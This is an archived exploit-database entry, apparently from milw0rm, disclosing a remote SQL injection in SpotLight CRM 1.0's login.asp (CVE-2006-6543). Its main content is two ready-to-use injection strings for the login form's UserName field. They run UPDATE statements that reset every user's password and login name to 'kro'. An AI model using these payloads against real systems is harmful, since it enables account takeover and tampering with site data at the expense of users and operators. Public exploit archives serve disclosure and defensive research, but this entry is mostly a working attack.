SpotLight CRM 1.0 login.asp Remote SQL Injection Vulnerability

2006-12-09T00:00:00
ID EDB-ID:2907
Type exploitdb
Reporter ajann
Modified 2006-12-09T00:00:00

Description

SpotLight CRM 1.0 (login.asp) Remote SQL Injection Vulnerability. CVE-2006-6543. Webapps exploit for asp platform

                                        
                                            *************************************************************************************
# Title   :  SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(
# $$$     :  $2,499

*************************************************************************************


[[SQL]]]

###http://[target]/[path]//login.asp=[POST SQL]

Example:
-> All User UserName And Password Changed "kro"

// login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'--

[[/SQL]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-09]